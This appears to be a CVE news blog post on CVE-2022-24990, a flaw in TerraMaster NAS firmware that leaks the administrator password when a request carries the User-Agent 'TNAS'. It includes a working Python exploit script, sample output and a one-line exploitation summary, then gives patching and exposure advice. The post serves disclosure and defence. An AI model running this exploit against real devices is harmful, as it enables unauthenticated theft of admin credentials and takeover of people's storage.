CVE CyberSecurity Database News

CVE-2022-24990 - How Hackers Can Steal TerraMaster NAS Admin Passwords (And What You Should Know)

Poster -

TerraMaster is a well-known maker of Network Attached Storage (NAS) devices you can find in many homes and small businesses. But in 2022, a pretty serious security bug (CVE-2022-24990) was found. This vulnerability allowed anyone on your network (and sometimes beyond) to steal your NAS administrator password with a single HTTP request—and all it took was pretending to be a TerraMaster mobile app.

This post explains how this vulnerability works, walks through a simple code exploit, and gives you the details you need to protect your device.

What’s the Problem?

If you own a TerraMaster NAS running version 4.2.29 or lower, you may be at risk. According to the original advisory, the bug allows a remote attacker to discover the admin password. They simply pretend to be the official app, by using a special header.

The vulnerable file:  
module/api.php?mobile/webNasIPS

If a request is sent with User-Agent: TNAS, the device just gives up the administrator password. No authentication needed.

The attacker sends a GET or POST request to

http://[YOUR_TERRAMASTER_IP]/module/api.php?mobile/webNasIPS

And sets the User-Agent header to TNAS.

Why? The NAS thinks this header means it’s talking to the official mobile app, so it gives more information than usual.

2. Look at the Password in the Response

The response is sent back in JSON format. There’s a field called PWD—and that’s the administrator password, in clear text.

Here’s a simple script to exploit this vulnerability

import requests

# Set your target NAS IP address here
target_url = "http://192.168.1.100/module/api.php?mobile/webNasIPS";

headers = {
    "User-Agent": "TNAS"
}

response = requests.get(target_url, headers=headers)

if "PWD" in response.text:
    print("Password found!")
    print(response.text)
else:
    print("Password not found or device not vulnerable.")

What to look for:

If successful, you’ll see output like this

{"success":true,"PWD":"your_real_admin_password","other_fields":"..."}

Now you (or an attacker!) have the admin password.

No login needed: Anyone on your network (or who gets into it) can grab your admin password.

- Remote attacks: If your NAS’ web port is exposed to the Internet, attackers worldwide can get in.

Mitigation and Fix

Are you at risk?  
If your TerraMaster runs TOS (TerraMaster Operating System) version 4.2.29 or earlier, you should act.

Update your firmware:  
TerraMaster addressed this in later updates. Upgrade your NAS software as soon as possible. Visit the official update page:  
https://www.terra-master.com/en/support/product-support/

Don’t expose your NAS  
Never open your NAS control panel to the world. Restrict access to your local LAN only.

Change the admin password  
After patching, change your admin password and check for new users or changes in your NAS.

References and Further Reading

- CVE-2022-24990 NIST Detail
- Original Security Advisory
- TerraMaster Official Security Bulletins

TerraMaster TOS ≤ 4.2.29 exposes admin password via a simple HTTP request.

- To exploit: Send request to /module/api.php?mobile/webNasIPS with User-Agent: TNAS, read the password from the JSON response.

Fix: Update your firmware and never expose your NAS to the open Internet.

Stay safe, and always keep your storage hardware up to date!

Timeline

Published on: 02/07/2023 18:15:00 UTC
Last modified on: 02/16/2023 14:24:00 UTC